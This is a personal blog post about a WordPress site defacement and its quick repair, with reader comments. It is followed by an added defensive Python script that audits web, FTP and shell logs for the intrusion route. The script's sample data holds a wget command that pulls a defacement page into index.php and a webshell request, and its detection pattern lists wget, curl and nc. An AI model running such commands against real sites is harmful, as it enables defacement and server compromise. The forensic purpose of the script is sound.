I guess it was bound to happen... There I was, happily tweeting away (on Twitter, obviously), and @jopkins told me something was up with my site. I tweeted what had happened, and @loudmouthman of Reduced Hackers was, as ever, the easiest to hear over the Twitter static.
He told me to call him, and I did immediately. Less than eight minutes later my site was back up: Nik had fixed it in the simplest of ways, by first assessing all of the possibilities and then simply dropping a new index.php file onto my server.
He gave me some invaluable tips on how to protect myself in different ways from other possible attacks and did all of this whilst simultaneously dealing with a client in another part of the UK!
I have changed all of my passwords that could have been compromised, but we won't know for sure how they got in until we get the log files back from www.nxs.nl. Needless to say I have backed up again and realise I am more than a little lucky. Lucky because in about ten years of having websites this is only the second time that this has happened. The first time was a nightmare. The difference now is that with a single tweet, an expert like Nik came to the rescue and sorted it out in around half an hour.
Nik is also the reason I have a Drobo sitting under the desk, humming away and casually backing up all of my data to protect against just such an event as this.
Without wanting to give him too much publicity: the hacker is Turkish and had placed a page protesting against what he was calling 'Stop Bush Crusade II'. I am wondering if I was targeted, as @Delboydare suggested, because I have a short photo piece on Kurdistan. We may never know.
Thanks to all of the other Twitterati that came to my aid with advice and suggestions as to what may have happened and how to sort it. There is a massive writhing beast of knowledge and skill out there in the collective mind.
We are connected... with our fingers on the keyboards and our eyes fixed to screens. It is almost as if the technology were grafted to our beings. We are the Twitter Borg.
[Check back in a little while and we may know more about how they got in to the site in the first place.]
Glad you were up and running again so quickly…
I watched this play out over Twitter. Glad to see things get so quickly resolved. Nice job Nik!
You’ve seriously got to upgrade from WP2.5; it’s really insecure. Do it now!
http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
Christian,
As you've already mentioned, we've not understood what mechanisms they used to put the bad index.php file onto your server. It's possible they have injected it via a script, or they uploaded it via FTP or via a shell on the server.
Yes, some of this is protected via good password management and good software update policies.
Some of this, though, should be appearing in the log files, which, when audited, should tell us the route by which they approached your site.
I've worked for many years with various clients providing advice in relation to improving security or accessing systems (in a forensic sense), and much of the diagnostic and then response methods used were very much by the book.
I'm looking forward to getting those log files for your domain and giving you an analytical breakdown of the event. Remember I would also like the log files for the shell if they are available (.bash_history) and the FTP stuff.
If people are interested I saved the incriminating index.php file for later review.
Thanks for the write-up, and if you're interested in site security and auditing, drop me a line at Loudmouthman or via Twitter or Skype.
Thanks.
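An added example, not Nik's or the site's own code, of the log audit described in the comment above: it runs over a web-server access log, an FTP transfer log and a .bash_history, brackets the moment index.php changed (by watching the size the server reported for it), and then lists the events in that window that could have written the file, so the three candidate routes (script injection, FTP upload, shell) can be narrowed down. The log formats (Apache combined log, wu-ftpd/proftpd xferlog), the sample lines and the list of write-capable WordPress endpoints are all constructed assumptions for the illustration, not data from this incident.

```python
import re
from datetime import datetime

# Constructed sample logs for illustration only; nothing here is from the real incident.
ACCESS_LOG = """\
203.0.113.5 - - [08/Jun/2008:10:12:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2008:10:12:44 +0000] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2008:10:13:02 +0000] "GET /wp-content/uploads/x.php?cmd=id HTTP/1.1" 200 312 "-" "curl/7.18"
203.0.113.5 - - [08/Jun/2008:10:13:30 +0000] "GET /about/ HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [08/Jun/2008:10:15:10 +0000] "GET /index.php HTTP/1.1" 200 1880 "-" "Mozilla/5.0"
"""
# xferlog format: five date fields, transfer time, remote host, size, file, type, flag,
# direction ('i' = incoming upload, 'o' = download), mode, user, service, auth, uid, status.
XFERLOG = """\
Sun Jun  8 09:01:12 2008 2 203.0.113.5 5120 /var/www/html/index.php b _ o r webuser ftp 0 * c
Sun Jun  8 10:14:30 2008 1 198.51.100.7 1880 /var/www/html/index.php b _ i r webuser ftp 0 * c
"""
BASH_HISTORY = """\
ls -la
cd /var/www/html
wget http://example.invalid/deface.txt -O index.php
chmod 644 index.php
exit
"""

APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Assumed list of WordPress endpoints that can write PHP files into the docroot.
WRITE_ENDPOINTS = ("theme-editor.php", "plugin-editor.php", "async-upload.php", "media-upload.php")
TRAVERSAL = re.compile(r"(\.\./|%2e%2e)", re.I)
HISTORY_RE = re.compile(r"\b(wget|curl|index\.php|chmod|base64|nc)\b")


def parse_access_log(text):
    """Parse Apache combined-format lines into dicts; unparseable lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = APACHE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        e["size"] = 0 if e["size"] == "-" else int(e["size"])
        entries.append(e)
    return entries


def defacement_window(entries, target="/index.php"):
    """Return (last time the page was served at its original size, first time at a new size).
    The size the server reports for a static-ish page is a cheap change detector."""
    hits = [e for e in entries if e["method"] == "GET" and e["path"] == target and e["status"] == 200]
    if not hits:
        return None
    baseline, last_good = hits[0]["size"], hits[0]["ts"]
    for e in hits[1:]:
        if e["size"] != baseline:
            return last_good, e["ts"]
        last_good = e["ts"]
    return last_good, None


def suspicious_requests(entries, window):
    """Requests inside the window that could have written or executed a file."""
    start, end = window
    found = []
    for e in entries:
        if e["ts"] < start or (end is not None and e["ts"] > end):
            continue
        reasons = []
        if e["method"] == "POST":
            reasons.append("POST in window")
        if any(ep in e["path"] for ep in WRITE_ENDPOINTS):
            reasons.append("write-capable endpoint")
        if TRAVERSAL.search(e["path"]):
            reasons.append("path traversal")
        if "/wp-content/uploads/" in e["path"] and e["path"].split("?")[0].endswith(".php"):
            reasons.append("PHP executed from uploads dir")
        if reasons:
            found.append((e["ip"], e["ts"].isoformat(), e["path"], reasons))
    return found


def ftp_uploads(text, target="index.php"):
    """Uploads (direction 'i') of the target file from an xferlog."""
    found = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 14:
            continue
        ts = datetime.strptime(" ".join(f[:5]), "%a %b %d %H:%M:%S %Y")
        remote, fname, direction, user = f[6], f[8], f[11], f[13]
        if direction == "i" and fname.endswith(target):
            found.append((remote, ts.isoformat(), fname, user))
    return found


def shell_history_hits(text):
    """(line number, command) for history lines that fetch, write or touch index.php."""
    return [(n, l) for n, l in enumerate(text.splitlines(), 1) if HISTORY_RE.search(l)]


def audit(access=ACCESS_LOG, xfer=XFERLOG, history=BASH_HISTORY):
    entries = parse_access_log(access)
    window = defacement_window(entries)
    return {
        "window": window,
        "web": suspicious_requests(entries, window) if window else [],
        "ftp": ftp_uploads(xfer),
        "shell": shell_history_hits(history),
    }


if __name__ == "__main__":
    for route, events in audit().items():
        print(route, events)
```

With the constructed data all three sources point at the same minute or two, which is the point of collecting the web, FTP and shell logs together: a POST to the theme editor, a PHP file served from the uploads directory, an FTP upload of index.php from the same address, and a wget into index.php in the history. On a real host you would feed in the full rotated logs, not just the day of the defacement, and the size-based window is only a starting bracket, since a page whose length varies (comments, dynamic content) needs a hash of the file from backups instead.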
Hmmm... apparently log files were not activated on my hosting. So no information there.